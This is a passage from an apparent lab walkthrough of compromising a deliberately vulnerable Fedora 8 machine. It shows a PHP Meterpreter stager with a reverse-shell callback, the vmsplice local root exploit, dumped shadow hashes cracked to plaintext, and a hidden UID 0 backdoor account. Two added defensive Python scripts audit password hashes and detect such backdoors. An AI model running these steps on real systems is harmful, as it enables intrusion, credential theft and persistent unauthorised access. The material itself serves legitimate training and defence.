# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :




Step 3:
msf exploit(udev_netlink) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.110   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.110   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:





Step 5:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686
Meterpreter : php/php

meterpreter > getuid
Server username: apache (48)
meterpreter > getpid
Current pid: 6464


We have a shell now.

However we are in as the apache user. We need to attempt a privilege escalation.


Now the steps I will try :

Step 1 : As I am on Kali Linux, I will search for PE exploits locally first
root@kali:~/vulhub/ctf5# searchsploit 2.6.23 local linux
------------------------------------------------------------- ----------------------------------
 Description                                                | Path
------------------------------------------------------------- ----------------------------------
 Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit | /linux/local/5093.c
------------------------------------------------------------- ----------------------------------

Step 2 : Compile the binary
root@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp /usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc 5093.c -o 5093

Step 3 : Transfer the file to the victim from meterpreter
meterpreter > lcd vulhub
meterpreter > lcd ctf5
meterpreter > lpwd
/root/vulhub/ctf5
meterpreter > upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shell
Process 13468 created.
Channel 2 created.

cd /tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod +x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
root
WE ARE ROOT NOW !!

Post Exploit:

bash-3.2# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash


bash-3.2# cat shadow
root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::
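Every live hash in the shadow dump above starts with `$1$`, the crypt(3) identifier for md5crypt (1000 rounds of MD5, the algorithm hashcat's `-m 500` mode targets), and two service accounts (mysql, cyrus) keep an interactive shell. The following audit script is an added example, not the walkthrough's own code: it classifies each shadow entry by hash family and flags md5crypt/DES hashes and low-UID accounts with login shells. The passwd/shadow samples are constructed in the same layout as the dump (hash bodies are placeholders), and `UID_MIN = 500` is an assumption taken from the listing, where regular users start at UID 500.

```python
"""Audit passwd/shadow content for weak password hashing and service
accounts with login shells.  Added example; not from the walkthrough."""
import re

# Constructed samples in the layout of the dump above; hash bodies are
# placeholders, not the hashes shown on the page.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$1$placehold$PLACEHOLDERMD5CRYPTBODY00:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
patrick:$6$placehold$PLACEHOLDERSHA512CRYPTBODY:15679:0:99999:7:::
mysql:!!:14362::::::
"""

# crypt(3) "$id$" prefixes -> hash family.
HASH_FAMILIES = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}
WEAK_FAMILIES = {"descrypt", "md5crypt"}   # cheap enough for dictionary runs
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/ksh", "/bin/csh", "/bin/tcsh"}
UID_MIN = 500  # assumed: first regular-user UID, as in the listing above


def hash_family(field):
    """Classify the password field of one shadow entry."""
    if field in ("", "*") or field.startswith("!"):
        return "locked"                       # no usable password
    m = re.match(r"^\$([^$]+)\$", field)
    if m:
        return HASH_FAMILIES.get(m.group(1), "unknown")
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"                     # legacy DES: 2-char salt, 8-char max
    return "unknown"


def parse_colon_file(text):
    """Map the first field (user name) to the full field list."""
    rows = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows


def audit(passwd_text, shadow_text):
    """Return (user, finding, detail) tuples for risky entries."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, pw in passwd.items():
        uid, shell = int(pw[2]), pw[6]
        entry = shadow.get(user)
        family = hash_family(entry[1]) if entry else "missing"
        if family in WEAK_FAMILIES:
            findings.append((user, "weak-hash", family))
        elif family == "unknown":
            findings.append((user, "unrecognised-hash", entry[1][:4]))
        elif family == "missing":
            findings.append((user, "no-shadow-entry", ""))
        # Service accounts (below UID_MIN) normally get /sbin/nologin.
        if 0 < uid < UID_MIN and shell in INTERACTIVE_SHELLS:
            findings.append((user, "service-shell", shell))
    return findings


if __name__ == "__main__":
    for user, kind, detail in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user:10} {kind:18} {detail}")
```

On a live host, feed it the contents of `/etc/passwd` and `/etc/shadow` instead of the samples. Any `weak-hash` finding means a leaked shadow file is a cracking exercise measured in minutes, which is exactly what the hashcat run further down demonstrates.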

bash-3.2# cd /home
bash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issue
Fedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-release
Fedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr 08:00:27:C3:02:2B
inet addr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost localhost
::1 localhost6.localdomain6 localhost6


Let's crack the user passwords now:

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer - johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root hash with John looks tedious, so let's try hashcat instead:

root@kali:~/vulhub/ctf5# hashcat -m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcat will expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015


So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# whoami
root
[root@localhost ~]# 



Creating a backdoor user with root privileges :

bash-3.2# useradd -ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd | grep john
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passwd johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :

root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost ~]#
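The backdoor above is a second account with UID 0, which `useradd -o` allows and which then logs in as root under a different name. From the defender's side this is cheap to detect: a second UID 0 entry, a UID shared by two names, or any account that was not in a known-good snapshot of `/etc/passwd`. The script below is an added example, not part of the walkthrough: it compares a constructed baseline in the layout of the earlier passwd dump against the same file with the `johnsnow` line from the page appended, and returns the alerts a host monitor would raise.

```python
"""Detect a second UID 0 login (the backdoor pattern shown above) by
checking /etc/passwd against a known-good snapshot.
Added example; not part of the walkthrough."""

# Constructed baseline in the layout of the passwd dump earlier on the page.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
"""

# The same file after `useradd -ou 0 -g 0 johnsnow` (line as shown on the page).
CURRENT = BASELINE + "johnsnow:x:0:0::/home/johnsnow:/bin/bash\n"


def parse_passwd(text):
    """Map user name -> {uid, gid, home, shell} for each passwd line."""
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        accounts[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return accounts


def uid0_accounts(text):
    """Every account that resolves to root's privileges, whatever its name."""
    return sorted(n for n, a in parse_passwd(text).items() if a["uid"] == 0)


def shared_uids(text):
    """UIDs held by more than one account (exactly what useradd -o permits)."""
    by_uid = {}
    for name, a in parse_passwd(text).items():
        by_uid.setdefault(a["uid"], []).append(name)
    return {uid: sorted(names) for uid, names in by_uid.items() if len(names) > 1}


def diff_accounts(baseline_text, current_text):
    """Added, removed and modified accounts relative to the baseline."""
    before, after = parse_passwd(baseline_text), parse_passwd(current_text)
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(n for n in before.keys() & after.keys() if before[n] != after[n]),
    }


def review(baseline_text, current_text):
    """Alert strings a host monitor would raise for the current file."""
    alerts = []
    for name in uid0_accounts(current_text):
        if name != "root":
            alerts.append(f"uid 0 account other than root: {name}")
    for uid, names in shared_uids(current_text).items():
        alerts.append(f"uid {uid} shared by {', '.join(names)}")
    d = diff_accounts(baseline_text, current_text)
    alerts += [f"account added: {n}" for n in d["added"]]
    alerts += [f"account removed: {n}" for n in d["removed"]]
    alerts += [f"account changed: {n}" for n in d["changed"]]
    return alerts


if __name__ == "__main__":
    for line in review(BASELINE, CURRENT):
        print(line)
```

On a real host, pass the current `/etc/passwd` contents and a snapshot stored off-box as the two arguments. The snapshot comparison also catches quieter changes (a shell switched from `/sbin/nologin` to `/bin/bash`, a home directory moved), and an auditd watch such as `-w /etc/passwd -p wa -k identity` records the write itself at the moment `useradd` runs.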

